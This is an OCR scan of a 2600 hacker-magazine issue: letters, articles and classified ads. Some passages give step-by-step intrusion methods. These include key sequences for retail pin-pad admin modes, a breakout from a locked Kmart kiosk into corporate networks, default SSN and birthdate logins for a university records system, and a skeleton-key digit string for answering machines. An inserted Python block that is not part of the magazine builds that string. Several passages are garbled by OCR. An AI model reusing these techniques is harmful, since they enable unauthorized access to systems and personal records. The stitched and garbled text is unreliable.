Maybe because I work in advertising, maybe be- 
cause I have more training in economics than the aver- 
age bear, maybe because I know people who work for 
firms like doubleclick.net, but maybe because I like 
free goods and services, is why I have to complain 
about all the derisions against doubleclick, akamai, et 
al. 

Yes, these firms do invade privacy. They track a 
unique identifier - "you," as it were, and they know 
when you have been sleeping, they know when you're 
awake, etc. But these firms do not pose a threat against 
us. 2600 readers should have an affinity for how things 
work and should know how to get around them. To 
avoid ads without overhead go to 
http://www.yoyo.org/~pgl/adservers/ and edit your 
hosts file. Turn off cookies, or use cookie management 
software, or just do it yourself to your temp folders 
from time to time. 

These firms provide their clients - websites like 
wired, for example, with the revenue that allows them 
to go on publishing free news on their website. If you 
use any of the ubiquitous free services, like weather, 
news, e-mail, etc. - services that not more than ten 
years ago cost real money, you have firms like dou- 
bleclick and akamai to thank for it. 

I'm not saying that should open your system up for 
these firms to pick through, by no stretch of the imagi- 
nation. But insofar as online privacy is concerned, the 
real "bad guys” are firms that produce things like the 
infamous BDE installation engine, CometCursor, and 
others that surreptitiously track your movements. We 
all know that doubleclick tracks online activity - that's 
what they do. They are not hiding behind a file sharing 
protocol, or a web site “enhancement.” A little bit of 
privacy is the price of admission to premium content 
sites. And there is a worse case scenario. A subscrip- 
tion based Internet would give you even less privacy 
because now they would have a name, address, and 
credit card number to match up with a browser's 





in web page performance is worth the 
exorbitant costs (at least for simple object delivery) is 
a matter of debate. 

As an added bonus, anyone who can figure out the 

unique global identifier. Knowing this, instead of run- 
ning at the mouth at how "evil" these firms are, put up 
and shut up. As long as all of doubleclick's URLs are 
pointed at 127.0.0.0, they don't know me, and I don't 
care. 
Kurt Winter 
Some good points, but what happens when they de- 
cide they're tired of people like you who bypass their 
tracking software? Perhaps they will even make it a 
crime. Stranger things have been happening. We feel 
people should at least have the option of deciding if 
they want to play by these rules. By letting people 
know how they work and with some of the information 
you've provided, people are better armed to deal with 
this. But just because these moneymaking firms are 
convinced that this is the only way the net can be run, 
it doesn't make it so. We should always be striving for 
ways to provide information and services to the masses 
in ways that aren't offensive, intrusive, or expensive. 


Dear 2600: 

In the article "Basics on Answering Machine 
Hacking" in 18:4, Horrid presented a 1005-digit se- 
quence that contains all the 3-digit numbers between 
000 and 999. He asked for another such sequence that 
is shorter. Well, it may be a bit simplistic but if he re- 
moved the two trailing zeros from his sequence and 
added a 9 at the beginning, it would be shortened by 
one digit while still containing all the numbers. It is 
well enough to use a computer to generate a number 
sequence, but one should exercise a little reasoning as 
well. 

ascii32 

You managed to shorten it but your triumph isn't 
going to last very long.... 


Dear 2600: 

Horrid’s string for accessing answering machines 
with 3-digit passwords is almost perfect. The minimal 
length for such a string is 1002 digits, not 1005. (In 
general, the length of a skeleton key for an answering 
machine code of length n is 10^n+n-1.) In order to re- 
move unnecessary repetition from Horrid's string, 
simply remove positions 999, 1000, and 1001. (The 

4899900 at the end of the string becomes 9900.) 
ted 

If you combine this with the previous letter's idea, 
you can get this down to 1001. 
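
The length formula quoted in the letter above (10^n+n-1), checked with an added example that is not from the letters or the magazine: it builds a covering string with the standard Lyndon-word de Bruijn construction, confirms the length and coverage, and then contrasts two constructed checker models to show why a machine that matches the code anywhere in the key stream is the weak design. The class and function names are hypothetical.

```python
def de_bruijn_cycle(k, n):
    """Cyclic de Bruijn sequence B(k, n) built by concatenating Lyndon words
    (the standard Fredricksen-Kessler-Maiorana construction)."""
    a = [0] * (k * n)
    out = []

    def extend(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        extend(t + 1, p)
        for digit in range(a[t - p] + 1, k):
            a[t] = digit
            extend(t + 1, t)

    extend(1, 1)
    return out


def covering_string(n):
    """Digit string of length 10**n + n - 1 containing every n-digit code.
    A string of length L has only L - n + 1 windows, so nothing shorter can
    hold all 10**n distinct codes as substrings."""
    cycle = de_bruijn_cycle(10, n)
    # Unroll the cycle: repeat its first n-1 digits so wrap-around windows appear.
    return "".join(map(str, cycle + cycle[:n - 1]))


def codes_seen(stream, n):
    """Set of distinct n-digit windows present in the stream."""
    return {stream[i:i + n] for i in range(len(stream) - n + 1)}


class SlidingWindowChecker:
    """Constructed model: unlocks as soon as the last n digits keyed equal the code."""

    def __init__(self, code):
        self.code, self.recent = code, ""

    def press(self, digit):
        self.recent = (self.recent + digit)[-len(self.code):]
        return self.recent == self.code


class FramedChecker:
    """Constructed model of the fix: judge whole n-digit entries and lock out
    after max_failures wrong entries."""

    def __init__(self, code, max_failures=3):
        self.code, self.buffer = code, ""
        self.failures, self.max_failures = 0, max_failures

    def press(self, digit):
        if self.failures >= self.max_failures:
            return False                      # locked: further digits are ignored
        self.buffer += digit
        if len(self.buffer) < len(self.code):
            return False
        entry, self.buffer = self.buffer, ""
        if entry == self.code:
            return True
        self.failures += 1
        return False


def presses_until_unlock(checker, stream):
    """Number of key presses before the checker unlocks, or None if it never does."""
    for count, digit in enumerate(stream, start=1):
        if checker.press(digit):
            return count
    return None


if __name__ == "__main__":
    key = covering_string(3)
    print(len(key), len(codes_seen(key, 3)))
    print(presses_until_unlock(SlidingWindowChecker("731"), key))
    print(presses_until_unlock(FramedChecker("731"), key))
```
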


Dear 2600: 

After reading the article in 18:4 entitled "Examin- 
ing Student Databases," I'm surprised that Screamer 
Chaotix wasn't aware that most universities have some 
kind of student/faculty database that’s available for the 
school's use. Now what is amazing is that my school 
(which shall remain nameless to protect the innocent) 
has this information publicly available to everyone 
with just a short jot on the URL. Now it's just a good 
thing that Chaotix's friend's student ID isn't his SSN 
like it is with other schools (imagine the fun). Now the 
option to change it does exist, but it is one of those 
things that the school information technology depart- 
ment forgets to tell you during orientation. 

P4R4d0x 

Out by us, the State University of New York at 
Stony Brook has a system called SOAR (Student On- 
line Access to Records) that not only keeps information 
on students (transcripts, addresses, phone numbers, 
etc.) but on all alumni, often without their knowledge. 
The username is the SSN (easily obtained as it's also 
the student ID which is printed on everything from 
term papers to grade postings) and the password is the 
six digit birthdate (also easily obtained or easily 
guessed). Those few individuals who managed to fig- 
ure out how to change the password in the past will be 
delighted to learn that they apparently revert back to 
the default after a certain amount of time. It's said that 
a new system called SOLAR is about to be launched. 
Let's hope the added L somehow brings security. 


Dear 2600: 

A year ago, I picked up a copy of 2600 and was 
very fond of the information found. It was something I 
could read and not cringe at. Fast forward to today and 
all I see are articles on "right click suppression" and 
"building a wooden computer." Not to mention that 
many letters are angst filled piles of jealousy and stu- 
pidity from high school nitwits. What's happened to 
2600? It seems to have been going steadily downhill. 

Also, in regard to the letter about the Libertarian 
Party, your assumptions are wrong. Libertarian beliefs 
are founded upon freedom for both the individual and 
for the corporation, as well as the belief in personal re- 
sponsibility. Corporations are not always honest or 
ethical, and the goal of Libertarian views is to prevent 
the corporation from impeding upon the citizen (mak- 
ing laws like the DMCA null), and allowing the citizen 
freedom from the state, socially and economically. 

Scott 

Usually when we're accused of going steadily 
downhill, it’s for a longer period of time than a year. 
Perhaps you meant to accuse us of a sharp decline? As 
for Libertarian beliefs, it all sounds great except for 
the fact that it doesn't work. If a government lets huge 
corporations write the laws (such as in the United 
States today), it’s little different than there being no 
government at all to keep the corporations in check. 
It’s only in these places where governments actually 
represent the people that there’s even a chance of 
keeping the corporations from systematically abusing 
the power that inevitably comes from being huge. 


Dear 2600: 
This is in response to "Right Click Suppression" 
(18:4) by Rob Rohan. The right click suppression is 
not really a problem and it is in fact quite easy to by- 
pass by non-intrusive means. For example, to copy 
pictures from the site onto the clipboard, you don’t 
need right click. Use Internet Explorer (lets you high- 
light images) and just highlight the image (or whatever 
else you wanted to right-click on) using the left mouse 
button. Then simply press the Microsoft context-menu 
key (the key between CTRL and ALT on a standard 
104-key keyboard - it's next to the Microsoft logo 
key). Most people I know find this key to be useless, 
and some even nn it. But de Y bebe 
key is quite a if used to your ¿ 
people who don't have" is y 
can simply highlight the picture 
tion: Edit-Copy to copy it 
I think this is considerably easier than writing a Java 
program to save the picture. 
Emre Yucel 


Dear 2600: 

Another way to capture a web page is to simply do 
File, Edit Page in Netscape Communicator. I did this 
for a web page that had photos on it and it worked like 
a charm. 

InternetGoddess 


Dear 2600: 

In your 18:4 issue in the article "How to Hack from 
a RAM Disk" by Nv, the author recommends destruc- 
tion of CD media: "If you're really paranoid, you can 
torch/incinerate the CD. I've heard nuking the CD in a 
microwave is not 100 percent successful in destroying 
data (and it stinks!)." 

I would like to note that these examples of destroy- 
ing CD media are dangerous - fire could get out of 
control. I hope no one would actually place CD media 
in their microwave. There are also some companies 
that sell what they term degauss devices that effec- 
tively act as belt sanders and grind the CD media until 
you are left with dust and a plastic disc. I have recom- 
mended my company not purchase these devices as 
they are both expensive and unnecessary. 

Recently I found, purely by accident, a very effec- 
tive and inexpensive way to destroy CD media without 
the use of any machinery or heat. I had inadvertently 
placed a compact disc in a solution of Purex Bleach. 
Twenty-four hours later I found the disc transformed 
to a bath of metallic flakes and a plastic disc. The 
process may have taken less than 24 hours to dissolve 
the actual metal coating on the plastic disc, but it was 
in the bleach solution... 

heard of lately. 


Tracking Terrorists 


Dear 2600: 

I wanted to comment on a reply 
read@y t's letters. You stated to someone basic 
trying to hack Bin Laden was a Stupid. sa | a 
necessarily agree Sure, it comlllebe: wo: si but 
cracking into his bank accounts and such forth would 
actually do some good whether you believe it's a stu- 
pid thought or not. It would also be helping the Amer- 
ican cause a lot if the hacker community united and 
did something for the sake of our country. We bitch 
and moan about how much we hate our country, yet we 
were all angered by the events in September and all 
were united to help everyone. I mean, it’s very possi- 
ble that the government themselves are trying to crack 
into Bin Laden’s accounts. 






Chris 

First off, we don't "bitch and moan about how 
much we hate our country." We bitch and moan about 
those who continue to subvert the principles of democ- 
racy and get away with it, all the while masking them- 
selves in patriotic fervor. Second, when was the last 
time you "cracked into a bank account," let alone that 
of someone who's on a most wanted list - or in this 
case on ALL of them? It’s not like on TV and way too 
many people seem to think that it is. This leads to the 
perception that hackers can be used as some sort of cy- 
berarmy, which is about the furthest thing from the 
truth. Anyone with even a slight familiarity of the 
hacker world would know that we're constantly ques- 
tioning, disagreeing, exploring, and getting into trou- 
ble. Not exactly the kind of people who would do well 
in a military environment. (We happen to hear from a 
sizable number of unhappy hackers who somehow 
wind up in military service.) Finally, even if it were 
something simple, where do you get the right to be the 
judge, jury, and executioner? Imagine if everyone took 
it upon themselves to impose their brand of justice in 
this manner. If you really want to help, the best thing 
you can do is be observant and notice things that other 
people may not notice. Then let people know what you 
see. In this age where the truth is fleeting and mass 
manipulation is common, the ability to detect when 
something doesn't make sense is a valuable one. 


Dear 2600: 

I'm writing to disagree with your analysis that the 
government should release an original digital version 
of the bin Laden tape. Apparently all digital video 
tapes have special "markers" for things like time, cam- 
era lens settings, etc. It seems silly to think that our 
government is good enough to fake bin Laden's image 
and voice, but can't fake a few digital markers to go 
along with that. The government didn't have to release 
any evidence at all, so be lucky you got any. If you re- 
Lit, then reject it but don't expect them to pander to 
| T ve uo 3 






Dan 
They didn't have to release any evidence at all? 
What kind of world do you live in? It is the obligation 
of thinking people everywhere to question and analyze 
without relying on blind faith. Almost every major con- 
flict in the world can be traced to people who refuse to 
poe of seeing something they 
don't want to see. As people with a technical knowl- 
edge of such things, it was a lot more than a mere 
"whim" for us to want to see the timecode of the tape. 
There were numerous details attesting to the authentic- 
ity that could have been garnered by seeing these val- 
ues. While they could have been faked, it would take 
an extraordinary amount of effort and time to get all of 
them just right. That's why their release in a timely 
manner was so essential. And it’s a perfect example of 
how hackers can help in these troubled times - by us- 
ing some technical knowledge to let the world know if 
something makes sense or not. Of course, to do this 
properly you have to accept the fact that you don't 
know the answer until you analyze the data. It’s puz- 
zling and quite disturbing that the United States gov- 
ernment wouldn't want this evidence to be known. But 
what's even worse is when people close their eyes to 
the mere possibility that the facts don't add up. 

Right Click Suppression 


by Pete 

The purpose of this article is to provide an ex- 
tension to "Right Click Suppression" by Rob 
Rohan in 18:4. 

Blocking right-clicks, whether on the entire 
page or just images, is growing more and more 
popular as a form of weak copyright protection. 
I've encountered sites attempting to prevent me 
from saving material copyrighted by people other 
than the owner of the page! 

In addition to the methods mentioned by Mr. 
Rohan, Windoze users can click on an image and 
drag it from the browser to their desktop or another 
folder to copy the image. Linux users can try the 
provided script. 
nm “Finished”; 





The Script 

The script Isninja.pl is designed to get around 
that kind of right-click protection without having to 
root through the source yourself. Supply it with a 
few URLs and it will print all of the scripts (includ- 
ing the one used to block your right-clicks) found 
on those pages, along with the URLs of the images. 
Optionally, it will download the images and put 
them in the current directory. If you want to down- 
load the flash presentations, the midi music, or 
whatever, it would be fairly easy to add that to the 
script. In the absence of wget, Mr. Rohan’s Java 
app would also work well. I had to dust off my Perl 
skills for this, so please forgive me if it’s a bit 
sloppy. 

by dual_parallel 
dual_parallel@hotmail.com 

In this article I'll discuss some variations in a 
common pin pad, a couple of hacks at a large re- 
tailer, and finally a disturbing trend. 

In my last article I discussed the VeriFone 
PinPad 1000 and the button presses (all simulta- 
neous) needed to access the Master Key, or Mkey. 
Variations exist. Some pads are set to access the 
Mkey by pressing the bottom right and top right 
buttons. But the vast majority are set to access the 
Mkey by pressing the bottom right and top left 
buttons. 

The last article discussed Wal-Mart. This arti- 
cle will discuss its failing competitor, Kmart. The 
pin pads at every Kmart register are Checkmate 
model CM 2120s, OS 1.07, version 2.1. One can 
gain access to the pin pad by pressing the four 
small buttons by the LCD screen, and the two 
bottom-most buttons, green Enter and red Cancel, 
simultaneously (think Vulcan mind meld). After 
an incorrect password, the pad will cycle, verify- 
ing the applications that the user has authorized 
access to. 

Now, from pin pads to PCs. Walking into 
Kmart, at the Customer Service counter, one will 
immediately see one of two public computers 
running BlueLight.com, Kmart's online shopping 
application. These computers, the other residing 
in Electronics or sometimes Sporting Goods, run 
NT 4, have LCD monitors, a keyboard, and an en- 
closed trackball where the right button is trapped 
under plastic. The BlueLight.com application 
starts automatically, so logging off or shutting 
down just brings the application right back up. 

BlueLight.com (v 1.0.55) is an e-commerce 
application that features products and a shopping 
cart, running on publicly available NT computers 
in many Kmarts across the nation. The applica- 
tion is a browser, accessing the Internet to trans- 
mit selections from the local Kmart to 
Kmart.com's servers (kih.kmart.com). BlueLight 
takes over the machine, running in the fore- 
ground. So the first thing to do is to log off by 
pressing Ctrl+Alt+Delete and clicking Logoff. 
The machine will cycle quickly, bringing up the 
NT desktop and then the BlueLight app. Now, do 
anything to stop the machine from running the 
BlueLight app. I was lucky: there was a printer 
configuration problem that popped up an error 
window and stopped BlueLight. 

I left the printer error window alone and 
started poking around the desktop. I saw that any- 
thing significant that could be accessed from the 
Start button was missing. Function keys and Task 
Manager were disabled. The only thing in the sys- 
tem tray was anti-virus and... the clock. I double 
clicked the clock and the time was correct. Not 
for long. Windows applications and temporal 
anomalies do not mix. So I set the year to 1980, 
clicked Apply, and OK. Dr. Watson promptly 
crashed. 

What can I leverage here? One of the buttons 
in the Dr. Watson error window was Help. Click- 
ing Help brought up your favorite Contents-In- 
dex-Search. I messed around in Help until I had 
the option to search for Windows Help files. This 
gave me an Open File dialog box. 

Should I search the C drive, C:\WINNT? No, 
I went to Network Neighborhood. And there, with 
little perusing, I saw vast networks like km- 
northamerica, kminternational, kih.kmart.com - 
way more than I could write down without being 
noticed. 

I believe Kmart is counting on securing un- 
wanted access from the BlueLight computers 
(which probably have trusted access) to these 
large nets by locking down these NT boxes. As 
you can see this isn't the case. 

Finally, I want to discuss, not a hack, but what 
I can only call negligence. Throughout my explo- 
rations I examined quite a few pin pads. And un- 
derneath many I would find a sticker with an 800 
number and a client number. The 800 numbers 
belong to either banks or transaction handling 
companies, and the client number is the only au- 
thentication needed to access sales, deposit, and 
checking account information for a given vendor. 
Having dealt with small businesses and having 
found these stickers at such, I know that this in- 
formation is held closely. It is a shame that some- 
one needs only a remote interest to access this 
private information. 



by c3llph 
c3ilph@hotmail.com 

In the summer and autumn of 2000, Radio 
Shacks across the country got a new fixture, the 
Microsoft Internet Center. At the heart of these is 
of course a Compaq Presario 5000 series. Most are 
a P3 600 with 128 MB of ram and no anti-virus 
software (yes, backdoor-G/backorifice work well 
with these). The computer is linked by cat5 to a re- 
ceiver/decoder box in the back. A Skystar Advan- 
tage model VSTAT IDU is what this store is 
equipped with. The Skystar is connected by coax 
to a commercial size two-way dish in the roof. 
Those in cities are equipped with, in all likelihood, 
DSL. I assume this because in the kiosk it gives the 
choice to learn about high-speed access by either 
DSL or satellite. The stores in rural America are 
equipped with what was Gilat-to-Home 
(www.gilat.com). After being called Gilat-to-Home, it was 
renamed to Starband. Now Radio Shack or Mi- 
crosoft has dropped them for service because they 
were slowing the show. Other companies have 
looked at Gilat including Echostar, Russia's Ya- 
maltelcom, PMSI, ISKRA, etc. Radio Shack has 
now switched to Hughes, the current owner of our 
favorite free satellite TV provider. Only the server 
side changed, none of the customer equipment. Gi- 
lat had prior to the switch put out version two of 
their receiver box, a free upgrade to existing cus- 
tomers. This original setup required you to pur- 
chase one of two "specially configured Compaq 
computers," priced at $999 or $1299 in addition to 
the actual satellite equipment and overpriced in- 
stallation. Since then, about May or June '01, both 
these computers have been discontinued and are 
no longer available. From other dealers I have 
talked to, the lower cost machine wasn't up to par 
to run the system from the beginning. Originally 
set for a January or February '01 release was the 
USB-only version that could run with an existing 
computer to hook up to the satellite system. These 
USB add-on boxes ended up working with only 
about one out of every ten computers. So they 
are/have been "finishing" testing for USB-only add 
on boxes. Since these are always connected, they 
have a constant assigned IP. 

In some franchise stores for sure, maybe in cor- 
porate ones also depending on the intellect of the 
managers and their location (i.e., broadband op- 
tions), owners/managers have tied into the 2-way 
satellite to access the Internet for their store's In- 
ternet connection. They do this either by use of a 
separate computer set up as a proxy server or with 

All stores (corporate and franchise) keep local 
in-store records only. Once a month the entire 
database is uploaded to Radio Shack’s corporate 
office. The old addresses are included in this for 
the purpose of recent address/phone number 
changes, etc. Then the Radio Shack corporate of- 
fice crosses this with their previous files to com- 
plete the database update. Then we all get a flyer in 
the mail once a month. The flyers come at no cost 
to your local franchise stores. That is why we are 
always asking for your info. It's free advertising. 
Also, a recent update to the Radio Shack POS, 
found at www.radioshackpos.com, Allzip.exe, a 
self-extracting WinZip file, has let us add all the 
zip codes in the U.S. or per state if we so wish.
Most POS updates have both full install (server) 
and file only (client). Allzip.exe is installed on the 
server only, not any of the client computers. This 
creates two files in the C:\RSPOSICS\RSFILES 
directory, the same directory that holds all inven- 
tory, customer name, and most other database files. 
The files created are Rsallzip.exe and 
Pzipcode.bms. When you run the .exe, you get 
your choice of which states you want to add - one 
or all. You choose which ones, hit OK, then just 
enter the zip code and get the city name. You now 
don't have to ask the customer how to spell Kala- 
mazoo, or wherever they are from. Something in- 
teresting happens after the initial installation and 
running of RSallzip.exe. When run again it wants 
to connect up to the Radio Shack corporate server 
and look for new updates. When it does, it gives a 
basic store info screen that happens to have the 
server password listed in plain text. 

I hope I have shed a little light on Radio Shack 
doings. Also, I hope all of this info is correct. It 
may differ between store types and states. 

REGISTRATION IS UNDERWAY FOR H2K2 - the 4th HOPE
conference taking place July 12-14, 2002 at the Hotel Pennsylvania
in New York City! Admission for the entire weekend is $50. You can
register online at www.2600.com or send a check/money order by
6/15/02 to: 2600/H2K2, PO Box 752, Middle Island, NY 11953
USA. We've secured a special conference rate at the hotel of $109
for a single or double, $119 triple, $129 quad. Call 212-736-5000
and ask for the H2K2 rate. (You might even be able to find cheaper
rates at hotel discount sites on the net.) The Hotel Pennsylvania is
easily accessible from anywhere in New York City - it's directly
across the street from Penn Station on 7th Avenue. We've got 50,000
square feet to play with and we have lots of plans for this massive
space - more than 4 times the space we had for our last conference. If
you have an idea for a panel or presentation, it's not too late! E-mail
speakers@h2k2.net. We're also looking for participants to help us fill
the space with interesting projects of all sorts including computers,
robots, artwork, etc. Email space@h2k2.net if you're interested in
helping us fill the space. We need a ton of volunteers in all areas to
make this happen. You guessed it: volunteers@h2k2.net. We will
also have space for small vendors who have things of interest for
hackers. E-mail vendors@h2k2.net to become part of that. If you
want to take part in online discussions focusing on the upcoming
conference, join the H2K2 mailing list by e-mailing
majordomo@2600.com and typing "subscribe h2k2" on the first line of
your message. As always, check www.hope.net or www.h2k2.net for
updates!

DUTCH HACKER MEETINGS. Every second Sunday of the
month 't Klaphek organizes a meeting at the meeting point of the
central station of Utrecht in the Netherlands. Everyone interested in
hacking related subjects is welcome to show up. These meetings are
similar to the 2600 meetings. We meet around 14:00 (2 pm) in front
of the GWE office monthly. We hope to see you there! More info
can be found at www.klaphek.nl/meetings.html

SAN FRANCISCO OPENBSD USERS GROUP - now meeting
once a month at the Zephyr Cafe, 2nd Thursday - for info see
http://www.sfobug.org.

SUMMERCON 2002 will take place May 31-June 1 in Washington
DC at the Marion Renaissance on Sth Ave in NW by Gallery Place.
For more info, visit www.summercon.org.


For Sale 


FREEDOM DOWNTIME, the feature-length 2600 documentary, is
now available on video! See the adventure unfold as we try to get to
the bottom of the Kevin Mitnick story and prevent a major motion
picture from spreading more lies. Available on VHS in NTSC (U.S.)
format, 121 minutes. Send $20 to 2600, PO Box 752, Middle Island,
NY 11953 or order via our online store at www.2600.com.

REAL WORLD HACKING: Interested in rooftops, steam tunnels,
and the like? For a copy of Infiltration, the zine about going places
you're not supposed to go, send $2 to PO Box 13, Station E,
Toronto, ON M6H 4E1, Canada.

MAKE ANY SLOT MACHINE PAYOUT 200-400 credits. Works 
on 16 Ts machines. No contact. Also available, blackjack counters. 
E-mail mcorballi@atlanticcity Icom if you want to discuss it further. 

WWW.PROTECT-ONE.COM. Protect yourself! Everyone has a
need to be and feel safe from the outside world. We carry a full line
of self defense, security, and surveillance products at low prices.
Everything from alarms to mini cameras to telescopic batons to stun
guns and more! Check us out, all major credit cards accepted. We
ship worldwide!

CYBERTECH TECHNOLOGICAL SURVIVAL NEWSLETTER:
Bimonthly high tech and low tech DIY information on self-reliance
and preparedness edited by 2600 writer Thomas Icom. Topics
include communications, security, weaponry, electronics, alternative
energy, survival medicine, and intelligence operations. Send $12
cash or "payee blank" money order to Cybertech, PO Box 641,
Marion, CT 05444 or subscribe via Paypal on our website at
http://www.ticom-tech.com.

MACINTOSH HACKERS can get all the mac underground files on
a professionally published CD. 650 Megs of PURE macfilez.
Includes the Defcon 7 Macintosh security speech, the whole Freaks
Macintosh Archives and Whacked Mac Archives. $25.00 USD - will
ship internationally. SecureMac, PMB 310, 6170 W. Lake Mead
Blvd., Las Vegas, NV 89108, USA. Hack from your Mac!

LEARN LOCK PICKING. It's EASY with our new book. Learn
what they don't want you to know. Any security system can be
beaten, many times right through the front door. Be secure. Learn the
secrets and weakness of today's locks. If you want to get where you
are not supposed to be, this book could be your answer. Explore the
empowering world of lock picking. Send twenty bucks to Standard
Publications, PO Box 2226HQ, Champaign, IL 61825 or visit us at
www.standardpublications.com/direct/2600.html for your special
price.

COVERTACCESS.COM. Amazing EQUIPMENT and SERVICES
providing you with the physical and records access you need!

OVER 150 TELECOM MANUALS are now available online for
free viewing/downloading at The Synergy Global Network's fully
redesigned website. Most being available in Adobe PDF format, they
are crisp, clean, suitable for printing, and complete. Update your
phreak library now before it's too late. We don't know how long this
website will be allowed to distribute these manuals, however they
are yours for the time being. Our website is free and open to the
public, and requires no purchase of any kind, and is also free from
pop-up (or pop under) advertisements as well. PAYPHONE SERVICE
MANUALS TOO! Visit us online at: http://www.synergyglobalnetworks.com.

HATE MICROSOFT? Or do they just leave a foul aftertaste? Show
your dissatisfaction with a "Calvin peeing on Microsoft" sticker.
Sticker is approx. 7x9" and fits nicely in a car window or even on
the side of your favorite *nix box. Each sticker is made of commercial
grade vinyl. Water and UV ray resistant. To see a sample go to
http://calvinhatesmicrosoft.hypermart.net. $7.00 (US), $10.00 (US)
for international. Order the Calvin sticker and the MS logo is yours
free. That's right, THE MICROSOFT LOGO IS FREE (eat that one,
Bill). Send all orders to CD Mayne, PO Box 571791, Murray, Utah
24157 USA. Cash or money orders only. No checks, credit cards, or
COD. Allow 2-3 weeks for delivery via USPS.

BECOME RECOGNIZED as the hacker, phreaker, or computer
guru you really are. BROWNTER.COM has a wide selection of
clothing and gear especially designed for the computer underground.
From our comedic "Blame the hackers" t-shirt series, to coffee mugs,
to tools and videos, BROWNTER.COM has what you're looking
for. Check us out!

CRYPTO OUTLAW T-SHIRTS. Governments around the world
are turning innocent people into crypto outlaws. Where will the
madness end? Cryptography may be our last hope for privacy. From
Curvedspace, the unofficial band of anarcho-capitalism. Get yours at
curvedspace.org/merchandise.html.


Help Wanted 


HIRING PROFESSIONAL INTERNET CONSULTANTS with
job references only for the following: website security, performance
tuning, and marketing for online magazine. Please send your bio and
resume to: jbhartsworth@yahoo.com - you can work from home, but
should live in (or around) NYC, as you will need to attend a meeting
or two.

NEED ASSISTANCE to rescue/recover ASCII text data which are
presently compressed/encrypted by some type of commercial
program. Most files are rather large, from 30MB to about 6000MB.
Using DOS based search engine for retrieval. Please advise if there
exists any tools currently available or anyone who may be of help.
johndp4@hotmail.com.

I NEED TO BUILD A HIDDEN CAMERA SYSTEM including
sound on a limited budget to take with me on my visits with my
child in order to prove that everything is going well. Please e-mail
any recommendations to lovepulse@yahoo.com, fax (208) 330-
125%,

LOCKSMITHS: I am in need of a keymaker from only a picture
and a pencil sketch over of a key. Pending on timing and location, I
may be able to get the key for a Saturday or Sunday afternoon
meeting. I am in Kenosha, WI, so I can only go to Milwaukee or North
Chicago for meetings. Please e-mail at Mifster$8 hotmail.com if
interested, make the subject "keymaker."


NEED TECHNICAL ILLUSTRATOR. I'm writing a book on
security circumvention, lock picking, bypass, safes, alarms, and other
subjects, need someone experienced at technical drawings to create
original black and white illustrations for my book. I live in the
Dallas-Fort Worth area of Texas and would prefer someone of college
age nearby, although we could probably manage long distance
collaboration. This will be unpaid work for both of us until the book
gets published, at which point we'd split the profits equally. I intend
to offer it to Loompanics or Delta Press, and have every confidence
that they'll want to publish it. Please contact me at
drill_relocker@yahoo.com if interested!

FEMALE HACKERS WANTED IN PITTSBURGH for a study
of the beliefs, behavior, and culture of computer hackers. I can offer
complete confidentiality. I pay $35 for an interview. I have no
connection with any law enforcement agency. I am a professor emeritus
(retired professor) but remain intellectually active. I have done
social research for many decades and have published many articles and
four books. I want to publish an article that will give an accurate,
reasonably sympathetic picture of what hackers are really like - no
whitewash, no journalistic sensationalism, and no law enforcement
hype. Make untraceable telephone call to 402-343-2508 or send
untraceable e-mail message to blieher@ieleramacam. I completed 15
interviews so far, all with men. I am told that there are women
hackers but so far none have contacted me. I meet my respondents in a
public place, so far mostly in Starbucks coffee shops. You can learn
about me by doing a Google search for Bernhardt Lieberman.

KIDNAPPED BY THE SECRET SERVICE, charged with
UNAUTHORIZED USE OF AN ACCESS DEVICE, all my computers
confiscated, 8 years remaining on sentence. Father of two seeking
donation of PC's for kids, both computer savvy but now without
hardware, software, etc. Am willing to pay shipping on donated
PC's, software, and peripherals, if necessary. Contact me for
shipping info: Mr. Derren Leon Felder, Sr. 47742-0606, United States
Penitentiary, Atlanta, Georgia, Box PMB, 601 McDonough Boulevard,
S.E., Atlanta, Georgia 30315-4400; or e-mail me at
bigdarren200 E yahoo.com.

HACKERS HEALTH ALERT - BRAZILIAN "MAD COW"
CONCERNS: Brazil's cattle, sheep, and goat meat and associated
products (dairy products) have been banned by Canada since February
2001 and the U.S. Department of Agriculture (USDA) has
restricted the importation of ruminant products from Brazil after
March 2, 2001 because of concerns for bovine spongiform
encephalopathy (BSE) (mad cow disease). BSE is always fatal after it
eats away in human brain tissue and leaves sponge-like holes.
Boycott Brazil is attempting to help people understand the Brazilian
"mad cow" issue. It is essential that ALL COUNTRIES suspend the
import of beef and dairy products from Brazil so the Brazilian
government may prove what is fact and what is fiction. Visit the Boycott
Brazil website for more information: www.brazilboycott.org.


SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY
CALIFORNIA OR FEDERAL COURT? Consult with a semantic
warrior committed to the liberation of information specializing in
hacker, cracker, and phreak defense. Contact Omar Figueroa, Esq. at
IRINN 086-5591 or (415) 956-5591, at omar taya yale.edu, or at 506
Broadway, San Francisco, CA 94133. Free personal consultation for
2600 readers. All consultations are strictly confidential and protected
by the attorney-client privilege.

FORMER CYBERCRIME PROSECUTOR now defends those
investigated or charged with this type of crime. Having been on the
other side, I know how the system works and how the government
can target YOU! With prosecutors probably wanting you to serve
prison time, you need a proven veteran trial attorney who knows
how to handle these cases and who knows how to defend your rights.
Jason O. Lamm, Esq. (602) 22-CYBER (222-9237). Lamm &
Associates, 5050 N. Sth Place, Suite 12, Phoenix, AZ 85014. Free
confidential and professional consultation.

GENERAL PURPOSE EMAIL IDENTITY AUTHENTICATION
SERVICE for use from CGI programs. Legitimate uses only
please. http:/ipiar.com/nettoyvs/TLAIS. html

MISUNDERSTOOD HACKERS UNDERSTOOD. Write me:
Consultations are no charge, and protected by clergy/client privilege.
Trained telecom & electronics tech. billy.sunday@techie.com.

COMPUTER SECURITY/SPY. Is a hacker in your computer or
network? Do you need a spy? If so, call Jason Taylor at (503) 239-
(431. Portland, OR inquiries preferred. $60 hour or e-mail
layior il inelarena:com,

WDCD - A WANTON DISPLAY OF CONTROL AND DISRUPTION.
WDCD is a half hour radio satire produced by a small group
of otherwise unemployed individuals with roomfuls of old
recordings, analog synthesizers, and racks full of strange electronics gear.
Born out of the pirate radio scene, WDCD has existed in various
forms on various unauthorized radio frequencies for longer than any
of us care to recall (or want to admit to). You can hear WDCD every
Friday at 6:30 pm ET on 7415 KHz shortwave and on other random
frequencies. If you don't have a shortwave radio, you're missing out
on some interesting stuff! Check out our website for more
information: http://www.wdcdradio.com. Verified WDCD listeners will get a
free surprise. WDCD Radio, 614-8 8th St, 4319, Philadelphia, PA
19147. (215) 602-8328. Email mailbag@wdcdradio.com.

HACKERMIND: Tune in Thursdays at 10 pm ET by opening
